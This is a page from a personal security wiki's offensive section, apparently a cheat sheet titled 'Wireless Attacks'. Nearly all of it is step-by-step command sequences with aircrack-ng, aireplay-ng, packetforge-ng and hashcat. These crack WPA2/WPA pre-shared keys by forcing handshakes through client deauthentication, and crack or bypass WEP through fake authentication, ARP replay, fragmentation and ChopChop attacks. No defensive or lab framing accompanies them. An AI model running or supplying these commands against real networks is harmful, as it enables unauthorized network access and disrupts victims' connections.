AJ-Labz
  • whoami
  • The Lab
    • Building the Lab
      • Physical Hardware
      • ESXi
        • Install ESXi without a keyboard
      • vCenter Server Installation
      • Configure vCenter Datacenter
      • Virtual Networking
      • Install Virtual Machine
      • Install Virtual Firewall
      • Increasing VM Harddrive size
    • Building the Windows Domain
    • Building a Local DNS Server
    • Installing Apache Guacamole
    • Installing WireGuard VPN
    • Industrial Control Systems (ICS)
  • Defensive Cyberz
  • Analytic Repo
    • Beacon Detection
  • Creating an SIEM
    • Installing Security Onion (SO)
    • Splunk
    • Getting the Windows Data You Need
  • Zeek || Bro
    • Bro/Zeek Script
    • Installing Protocol Analyzers
  • Offensive Cyberz
    • Cobalt Strike Red Team Cheat Sheet
    • Defense Evasion
      • Evading Defender with CobaltStrike
      • Disable AV
      • AMSI Bypass
      • Evade Heuristic Behaviors
        • Process Injection
        • Process Hollowing
        • Reflection
        • AppLocker Bypass
        • Powershell CLM Bypass
      • Linux Shellcode Encoders
    • AD Enumeration
      • AD Tools
      • PowerView
      • BloodHound
      • DAFT Commands
      • Enumeration Commands
    • AD Attack
      • Prompt for Credentials
      • LAPS Reader
      • Abusing ACLs
    • Command and Control
      • Covenant Framework
      • Simple HTTPS Server
    • Linux
      • Shells
      • Impacket
      • SSH
      • Kerberos Cache File
      • Ansible
      • Privilege Escalation
    • Phishing
      • LNK Script
    • Wireless Attacks
    • Create a Trojan
  • Cyber Readingz
    • Recommended Readings
Powered by GitBook
On this page
  • Cracking WPA2
  • Cracking WEP with Open Authentication Clients
  • Cracking WEP Via Client
  • Cracking Clientless WEP
  • Bypassing WEP PSK
  • Cracking WPA PSK

Was this helpful?

  1. Offensive Cyberz

Wireless Attacks

Oldie but a goodie

PreviousLNK ScriptNextCreate a Trojan

Last updated 4 years ago

Was this helpful?

Cracking WPA2

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 — bssid <BSSID> -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a <BSSID> -c <CLIENT> mon0

########## crack password with aircrack-ng… ########### 

#download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## or crack password with naive-hashcat ##########

#  convert cap to hccapxcap2hc
capx.bin capture/-01.cap capture/-01.hccapx

# crack with naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

########## crack password with hashcat ##########
hashcat64.exe -m 2500 cap.hccapx rockyou.txt -r rules\<rule>

Cracking WEP with Open Authentication Clients

########## Cracking WEP With Clients (open authentication) ########## 
#enter monitor mode
airmon-ng start wlan0 <AP Channel>

#capture dump of target AP  
airodump-ng -c <channel> --bssid <MAC> -w <file-name> wlan0

#fake auth attack on AP
aireplay-ng -1 0 -e <AP ESSID> -a <MAC AP> -h <wlan0 MAC> wlan0

#fake auth attack on picky AP
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <wlan0 MAC> wlan0

#deauth attack to get ARP packet of another client
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0

#arp request replay attack
aireplay-ng -3 -b <AP MAC> -h <wlan0 MAC> wlan0

#deauth to speed up capture of IV/WEP Key
aireplay -0 1 -a <AP MAC> -c <Victim MAC> wlan0

#crack WEP Key
aircrack-ng -0 <filename>

Cracking WEP Via Client

########## Cracking WEP Via Client ########## 
#enter monitor mode
airmon-ng start wlan0 <AP Channel>

#capture dump of target AP  
airodump-ng -c <channel> --bssid <MAC> -w <file-name> wlan0

#associate your MAC with AP (fake auth attack)
aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> wlan0

#interactive packet replay attack 
aireplay-ng -2 -b <AP MAC> -d FF:FF:FF:FF:FF:FF -t 1 wlan0

#refined interactive replay attack
aireplay-ng -2 -b <AP MAC> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0

#replay the interactive replay attack to collect weak IVs
aireplay-ng -2 -r <capture filename> wlan0

#crack WEP Key
aircrack-ng -0 -z -n 64 <file-name>

Cracking Clientless WEP 

########## Cracking WEP without Clients ########## 
#enter monitor mode
airmon-ng start wlan0 <AP Channel>

#capture dump of target AP  
airodump-ng -c <channel> --bssid <MAC> -w <file-name> wlan0

# fake auth attack with association timing
aireplay-ng -1 6000 -e <ESSID> -a <AP MAC> -h <wlan0 MAC> wlan0

##Option 1: fragmentation attack until 150,000 bytes 
aireplay-ng -5 -b <AP MAC> -h <wlan0 MAC> wlan0

#find an active IP in the network
tcpdump -s 0 -n -e -r replay_*.cap

#create arp request packet
packetforge-ng -0 -a <AP MAC> -h <wlan0 MAC> -k <Dest IP/Local Broadcast IP> -l <Source IP> -y <xor file> -w <output file>

#inject crafted packet to recieve IV
aireplay-ng -2 -r <packetforge inject file> wlan0

#time to crack WEP Key
aircrack-ng -0 <capture file .cap>
 
#Option 2: KoreK ChopChop (tends to work when frag attack does not, but takes longer) 
aireplay-ng -4 -b <AP MAC> -h <wlan0 MAC> wlan0

#find an active IP in the network
tcpdump -s 0 -n -e -r replay_*.cap

#create arp request packet
packetforge-ng -0 -a <AP MAC> -h <wlan0 MAC> -k <Dest IP/Local Broadcast IP> -l <Source IP found in KoreK attack> -y <xor file> -w <output file>

#inject crafted packet to recieve IV
aireplay-ng -2 -r <packetforge inject file> wlan0

#time to crack WEP Key
aircrack-ng -0 <capture file .cap>

Bypassing WEP PSK

########## Bypassing WEP Shared Key Authentication ########## 
#enter monitor mode
airmon-ng start wlan0 <channel>

#capture dump of target AP  
airodump-ng -c <channel> --bssid <AP MAC> -w <file-name> wlan0

#deauth a connected client
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0

#shared key fake auth attack
aireplay-ng -1 6000 -e <ESSID> -y <sharedkey .xor> -a <AP MAC> -h <wlan MAC> wlan0

#ARP request replay attack
aireplay-ng -3 -b <AP MAC> -h <wlan0 MAC> wlan0

#deauth a connected client
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0

#time to crack WEP Key
aircrack-ng -0 <capture file .cap>

Cracking WPA PSK

########## crack WPA PSK ########## 
# put your network device into monitor mode
airmon-ng start wlan0

# if channel needed
airmon-ng start wlan0 <channel number>

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 — bssid <AP MAC> -w capture wlan0

#deauth a connected client to force a handshake
aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0

#crack with aircrack-ng
aircrack-ng -w <wordlist> <WPA PSK capture .cap>